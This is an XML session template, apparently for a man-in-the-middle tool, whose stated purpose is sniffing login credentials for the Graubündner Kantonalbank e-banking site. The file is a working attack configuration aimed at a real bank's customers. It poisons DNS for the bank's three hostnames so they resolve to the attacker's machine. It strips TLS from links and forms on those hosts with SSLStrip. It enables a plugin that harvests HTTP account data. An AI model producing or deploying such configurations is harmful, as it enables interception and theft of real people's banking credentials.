<SessionTemplate>

  <Config>
    <Name>Graubündner Kantonalbank user login</Name>
    <Description>Sniffing user credentials from login attempt on Graubündner Kantonalbank authentication procedure</Description>
    <Timestamp>2016-02-27</Timestamp>
    <Version>0.2</Version>
    <Author>Simsang</Author>
    <Reference>http://buglist.io/ </Reference>
  </Config>

  </Hops>
    <Hop>
      <Host>GET http://DUMMY</Host>
      <Description>User typed URL in browser</Description>
    </Hop>
  </Hops>    
   

<Plugins>
<Plugin name="DNS Poisoning" dirname="DNSPoisoning">

<ArrayOfDNSPoisonRecord xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
  <DNSPoisonRecord>
    <HostName>e-banking.gkb.ch</HostName>
    <IPAddress>@LOCALIP</IPAddress>
  </DNSPoisonRecord>
  <DNSPoisonRecord>
    <HostName>www.gkb.ch</HostName>
    <IPAddress>@LOCALIP</IPAddress>
  </DNSPoisonRecord>
  <DNSPoisonRecord>
    <HostName>gkb.ch</HostName>
    <IPAddress>@LOCALIP</IPAddress>
  </DNSPoisonRecord>
</ArrayOfDNSPoisonRecord>
</Plugin>

<Plugin name="HTTP accounts" dirname="HTTPAccounts">

<PluginData xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
  <Records />
</PluginData>
</Plugin>

<Plugin name="SSLStrip" dirname="SSLStrip">

<ArrayOfSSLStripRecord xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
  <SSLStripRecord>
    <HostName>e-banking.gkb.ch</HostName>
    <ContentType>text/html</ContentType>
    <Tag>a</Tag>
  </SSLStripRecord>
  <SSLStripRecord>
    <HostName>e-banking.gkb.ch</HostName>
    <ContentType>text/html</ContentType>
    <Tag>form</Tag>
  </SSLStripRecord>
  <SSLStripRecord>
    <HostName>www.gkb.ch</HostName>
    <ContentType>text/html</ContentType>
    <Tag>form</Tag>
  </SSLStripRecord>
  <SSLStripRecord>
    <HostName>www.gkb.ch</HostName>
    <ContentType>text/html</ContentType>
    <Tag>a</Tag>
  </SSLStripRecord>
  <SSLStripRecord>
    <HostName>gkb.ch</HostName>
    <ContentType>text/html</ContentType>
    <Tag>a</Tag>
  </SSLStripRecord>
  <SSLStripRecord>
    <HostName>gkb.ch</HostName>
    <ContentType>text/html</ContentType>
    <Tag>form</Tag>
  </SSLStripRecord>
</ArrayOfSSLStripRecord>
</Plugin>


</Plugins>
</SessionTemplate>
